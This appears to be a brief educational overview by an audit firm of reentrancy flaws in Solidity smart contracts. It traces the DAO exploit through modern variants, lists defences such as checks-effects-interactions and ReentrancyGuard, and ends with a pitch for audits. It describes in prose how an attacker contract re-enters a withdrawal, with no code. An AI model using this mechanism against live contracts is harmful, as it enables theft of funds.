Understanding Reentrancy: From the DAO Hack to Modern DeFi
HasFocus Research · 2026
Abstract
An educational overview of reentrancy vulnerabilities in Solidity smart contracts. We trace the evolution from the classic 2016 DAO exploit through modern cross-contract, read-only, and governance reentrancy variants, and discuss effective mitigation strategies for each category.
1. Classic Reentrancy
The original reentrancy pattern involves a function that makes an external call (e.g. sending ETH) before updating its own state. An attacker's contract receives the ETH, re-enters the original function via its fallback, and repeats the withdrawal before the balance is decremented. The fix is the checks-effects-interactions pattern: update state before making external calls.
2. Modern Variants
As DeFi protocols became more composable, new reentrancy variants emerged. Cross-function reentrancy exploits shared state between two functions. Cross-contract reentrancy targets interactions between separate contracts. Read-only reentrancy abuses view functions that return stale state during an ongoing transaction. Each requires different mitigation strategies beyond simple ReentrancyGuard modifiers.
3. Mitigation Strategies
Effective protection requires a layered approach: (1) always follow checks-effects-interactions, (2) use ReentrancyGuard on state-changing functions, (3) be cautious with callbacks from ERC-721/1155 hooks, (4) audit cross-contract interactions for shared state assumptions, and (5) consider formal verification for high-value contracts. No single technique catches all variants.
Want our team to review your protocol?
Our auditors apply this knowledge to protect real-world protocols every day.
Request an Audit